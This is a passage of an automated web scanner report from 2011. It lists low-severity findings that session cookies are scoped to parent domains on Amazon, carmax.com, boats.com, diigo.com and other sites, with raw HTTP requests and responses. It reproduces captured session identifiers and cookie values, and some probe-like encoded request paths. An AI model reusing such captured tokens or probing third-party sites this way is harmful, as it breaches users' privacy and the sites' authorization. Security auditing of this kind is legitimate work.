  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=176-7992041-7051429; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dvds-used-hd-action-comedy-oscar/b HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:30 GMT
Server: Server
x-amz-id-1: 0HWNJZZ0K25G6APS0SCV
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: PlF2/QEU0gca0keikYl5AAloXjb8+bYTwS4SenUAsR2Hj9g7OaMuaVTR9h/a5nWz
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=176-7992041-7051429; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16144


<html>
<head>

<style type="text/css"><!--
.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-size: small; }
.small { font-fami
...[SNIP]...

13.15. http://www.amazon.com/gp/css/homepage.html/x22

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /gp/css/homepage.html/x22

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=180-2179319-0570468; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gp/css/homepage.html/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:28 GMT
Server: Server
x-amz-id-1: 1JYB2VNQP8C55BB9NAK4
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: 3icGnhgAgfZUWLOZdmzfhDcF9EfU4+FBrZdxGpszK5HnHwSQN6UjuQ==
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=180-2179319-0570468; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16226


<html>
<head>


<style type="text/css"><!--


.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-s
...[SNIP]...

13.16. http://www.amazon.com/gp/gc/x22

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /gp/gc/x22

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=182-2480063-1810947; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gp/gc/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:29 GMT
Server: Server
x-amz-id-1: 1ARA2838P595NDE5BZ28
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: NeLbCQZvKIRHPa3udnf+jNalHfYaZDtVVTT+qpr1m3zHmdMhK0a3n/4PuJMtXurr
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=182-2480063-1810947; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16234


<html>
<head>


<style type="text/css"><!--


.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-s
...[SNIP]...

13.17. http://www.amazon.com/gp/product/0596804946

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /gp/product/0596804946

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=177-3345764-3077262; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • UserPref=1eR/Gb/7VAeIWvMabpkc9WVd0hSTZUbBg6Yo0T7TCpNQeuSuXtGxH2kY6bTAbin+sFXFOKV5+ocOk7K3+MvDkq0/b9bHz0ODJNpZCfzlXrKaMkf2mByUw4O7H6y0HxLzB0zDpXYjvDZIG9tAgupLtlSzvaVuVoeT9Dw57HxRkT1qFd69t1G9yhJCF1dMGn6BtkhaXaKQIwqLrzarx2jcK/uWu/DYGLfPjmFfwQeqDQqf1Pu2Z67u5nMckQSNU+AXG+4uuNDdjSW4U7/7jDdJMbrRu9ZM6nSR6im5LlC77EvTc5TQz8tq18VhoFQQ90njlOAwxtXq+PDB/vmIDD+i66lzV9/NoXGIbcoNaqBVAhvyZOIdxNL/NLFlkx8w8BdoJeoQup2Vg9OErw1DYhMF9610T7Jg13XTgsW4sfARA2h+TBwY5xsP9yVw1aDK1Hh6; path=/; domain=.amazon.com; expires=Tue Feb 01 14:04:19 2011 GMT
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gp/product/0596804946?ie=UTF8&tag=severdia-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=0596804946 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:04:19 GMT
Server: Server
x-amz-id-1: 1GMNYJAKA4TJD7BE20PT
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: rRZgZjI7evzN2uK+PGBNvEWrhG1Qajm2TBox690BsTrGBbLn0XvjcMMT1QA/Cp32
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=177-3345764-3077262; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=1eR/Gb/7VAeIWvMabpkc9WVd0hSTZUbBg6Yo0T7TCpNQeuSuXtGxH2kY6bTAbin+sFXFOKV5+ocOk7K3+MvDkq0/b9bHz0ODJNpZCfzlXrKaMkf2mByUw4O7H6y0HxLzB0zDpXYjvDZIG9tAgupLtlSzvaVuVoeT9Dw57HxRkT1qFd69t1G9yhJCF1dMGn6BtkhaXaKQIwqLrzarx2jcK/uWu/DYGLfPjmFfwQeqDQqf1Pu2Z67u5nMckQSNU+AXG+4uuNDdjSW4U7/7jDdJMbrRu9ZM6nSR6im5LlC77EvTc5TQz8tq18VhoFQQ90njlOAwxtXq+PDB/vmIDD+i66lzV9/NoXGIbcoNaqBVAhvyZOIdxNL/NLFlkx8w8BdoJeoQup2Vg9OErw1DYhMF9610T7Jg13XTgsW4sfARA2h+TBwY5xsP9yVw1aDK1Hh6; path=/; domain=.amazon.com; expires=Tue Feb 01 14:04:19 2011 GMT
Content-Length: 407243


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...

13.18. http://www.amazon.com/gp/site-directory/x22

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /gp/site-directory/x22

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=192-0833084-3663062; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gp/site-directory/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:29 GMT
Server: Server
x-amz-id-1: 040X2S941YQ8YM9GDF3Y
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: sl07PFCJKDLvXHwNIxyGk0Yh+o6P2TnOLpehS7jphg0PPwo4AItme2BkehKpR0Nz
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=192-0833084-3663062; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 106589


<html>
<head>


<style type="text/css"><!--


BODY { font-family: verdana,arial,helvetica,sans-serif; font-size: x-small; background-color: #FFFFFF; color: #000000; margin-
...[SNIP]...

13.19. http://www.amazon.com/music-rock-classical-pop-jazz/b

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /music-rock-classical-pop-jazz/b

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=181-0349682-3421209; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /music-rock-classical-pop-jazz/b HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:26 GMT
Server: Server
x-amz-id-1: 1AWZZSHBMYQFXNK2TZN0
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: XKxFVzH0piW6bh12P3jE4jVP61ZQQfn1i5c66cBPEQVMNGeFeEPIQFWJv/MdsXCT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=181-0349682-3421209; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16144


<html>
<head>

<style type="text/css"><!--
.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-size: small; }
.small { font-fami
...[SNIP]...

13.20. http://www.amazon.com/toys/b

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /toys/b

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=186-2589969-2680600; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /toys/b HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:33 GMT
Server: Server
x-amz-id-1: 036W1XT31RW6BQB2XSMW
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: kZWb7JrdWVARHF80ONC/A4r3Jr1hWDeGnSCm1H+YTMFGi/6Qk4MnrnFI1vNP5uxA
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=186-2589969-2680600; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16144


<html>
<head>

<style type="text/css"><!--
.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-size: small; }
.small { font-fami
...[SNIP]...

13.21. http://www.amazon.com/wishlist/x22

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /wishlist/x22

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
  • session-id=186-8078621-7036840; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wishlist/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:28 GMT
Server: Server
x-amz-id-1: 0Z3Y87WRFKJ1Q11M2G0K
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: Ego3ck6jsiMYzZQy5mq4k0LI7SMs9DdekEwnw6kJ4wxR9tBB8EcVyWP5nD7nnlOe
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=186-8078621-7036840; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16234


<html>
<head>


<style type="text/css"><!--


.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-s
...[SNIP]...

13.22. http://www.amazon.com/x22

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /x22

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:24 GMT
Server: Server
x-amz-id-1: 0V0RKC4376K2YMDSV37C
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: A6zGDRGUjbMlYPxnk59HD10S5EjU04c0tVHuI5EisIW4w9Xtq+yRZhGulJQoodS8
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16197


<html>
<head>


<style type="text/css"><!--


.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-s
...[SNIP]...

13.23. http://www.amazon.com/x22/x3e/x3cli

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /x22/x3e/x3cli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /x22/x3e/x3cli HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:24 GMT
Server: Server
x-amz-id-1: 0PCK2Z2XXY6R48VWHP5C
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: c5+vukLbuLrPzb9XbB4xNsX5E9P5pKl7cpikC6014m92Vy9HvsdHPJ1S4ooy8A74
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16197


<html>
<head>


<style type="text/css"><!--


.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-s
...[SNIP]...

13.24. http://www.aspirationtech.org/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aspirationtech.org
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • SESSa1e859be48bff007359d1ff84a233b4d=e6592a496b2ea8707443b03c3285fa30; expires=Thu, 17-Feb-2011 17:42:23 GMT; path=/; domain=.aspirationtech.org
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.aspirationtech.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:09:02 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESSa1e859be48bff007359d1ff84a233b4d=e6592a496b2ea8707443b03c3285fa30; expires=Thu, 17-Feb-2011 17:42:23 GMT; path=/; domain=.aspirationtech.org
Last-Modified: Tue, 25 Jan 2011 14:09:03 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-C" lang="en-C">
<head>
<
...[SNIP]...

13.25. http://www.boats.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.boats.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
  • boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
  • boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
  • boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
  • boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
  • boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
  • Apache=10.71.0.26.1295913435664098; path=/; expires=Wed, 26-Jan-11 23:57:15 GMT; domain=.boats.com
  • cuid=3425338186237716693; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
  • SL_Audience=870|Accelerated|799|1|0;Expires=Wed, 23-Jan-13 23:57:15 GMT;Path=/;Domain=.boats.com
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.boats.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:57:15 GMT
Server: Apache
Set-Cookie: Apache=10.71.0.26.1295913435664098; path=/; expires=Wed, 26-Jan-11 23:57:15 GMT; domain=.boats.com
Cache-Control: private
Content-Language: en-US
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats.listing_search_country_id=100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats.listing_search_country_id_us=100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats.active_sub_domain_listing_search_country_id=US; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats.listing_search_country_id=100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: cuid=3425338186237716693; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: JSESSIONID=b7lQLae-ucE5; path=/
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SL_Audience=870|Accelerated|799|1|0;Expires=Wed, 23-Jan-13 23:57:15 GMT;Path=/;Domain=.boats.com
Set-Cookie: SL_UVId=2B0DFE48C52A7F5A;path=/;
Set-Cookie: SL_NV1=1|1;Expires=Wed, 26-Jan-11 11:57:15 GMT;Path=/;Domain=.boats.com
X-SL-CompState: TouchUp


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

13.26. http://www.careersingear.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.careersingear.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • PHPSESSID=7d38163661ab3fa45bdf4f9462796ad7; path=/; domain=.careersingear.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.careersingear.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:57:49 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.9 mod_python/3.2.8 Python/2.4.3
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=7d38163661ab3fa45bdf4f9462796ad7; path=/; domain=.careersingear.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 29481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

13.27. http://www.carmax.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.carmax.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • KmxSession_0=cf2c1e2a-8b04-4848-b9f3-7d2c38c4b661; domain=.carmax.com; path=/
  • KmxCurrSession_0=AB=False&StartDate=1/24/2011 11:04:32 AM&IsIntranet=False&IsHomeOffice=False; domain=.carmax.com; path=/
  • KmxVisitor_0=VisitorID=81b44c0b-cf88-4418-90e8-39a8d968f28d&CookieDate=1/24/2011 11:04:32 AM&Zip=; domain=.carmax.com; expires=Tue, 24-Jan-2012 16:04:32 GMT; path=/
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.carmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: KMXCOM=UPIJWISKMXCOMWEB052T0x0000000e_0xc6b22d1fCOIKM; expires=Mon, 24-Jan-2011 17:04:31 GMT; path=/
Connection: close
Date: Mon, 24 Jan 2011 16:04:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: KmxVisitor_0=VisitorID=81b44c0b-cf88-4418-90e8-39a8d968f28d&CookieDate=1/24/2011 11:04:32 AM&Zip=; domain=.carmax.com; expires=Tue, 24-Jan-2012 16:04:32 GMT; path=/
Set-Cookie: KmxSession_0=cf2c1e2a-8b04-4848-b9f3-7d2c38c4b661; domain=.carmax.com; path=/
Set-Cookie: KmxCurrSession_0=AB=False&StartDate=1/24/2011 11:04:32 AM&IsIntranet=False&IsHomeOffice=False; domain=.carmax.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 68015


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>
   CarMax - Browse used cars and new cars online
...[SNIP]...

13.28. http://www.diigo.com/post

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.diigo.com
Path:   /post

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • _smasher_session=cdc373a2e1ecd61c7b92bca1b0e323d3; domain=diigo.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /post HTTP/1.1
Host: www.diigo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Tue, 25 Jan 2011 13:14:38 GMT
Content-Type: text/html; charset=utf-8
Connection: close
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Location: https://secure.diigo.com/sign-in?referInfo=http%3A%2F%2Fwww.diigo.com%2Fpost
X-Runtime: 0.00258
Content-Length: 142
